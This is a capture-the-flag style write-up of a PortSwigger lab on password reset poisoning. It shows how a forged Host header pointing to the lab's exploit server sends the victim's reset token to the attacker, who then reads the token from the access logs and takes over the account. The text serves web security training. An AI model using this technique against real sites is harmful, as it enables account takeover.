Basic Password Reset Poisoning

Lab#

Basic password reset poisoning · Practitioner

Solution#

Given#

This lab is vulnerable to password reset poisoning. The user `carlos` will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account.

You can log in to your own account using the following credentials: `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server.

Analyzing the task#

PortSwigger has a dedicated note on «Password reset poisoning». And also a series on «HTTP Host Header attacks». A web application doesn't know the address it's hosted at, so it has to rely on the Host header when it needs to, for instance, generate a full URL back to itself. That's exactly relevant to the password reset feature, which mails out a reset link.

Recon#

Let's look at the password reset request and try to manipulate the Host header.

We send a reset request for our own user. Now we send it again, but replace the Host header with our exploit server's address:

exploit-0a1a00a804fbe14180d3d4d001e100bf.exploit-server.net

Both requests came back 200. Let's check the emails:

• First — with a link to the vulnerable site
• Second — link to our exploit server

OK, now to send the email to carlos, we replace the username field with carlos and submit the request. Off to the access logs.

There's the victim's request:

/forgot-password?temp-forgot-password-token=3lc3xbctomlakufr3oftagyorpysgvwo

We follow the link, set any password. Then we log in.

Lab solved!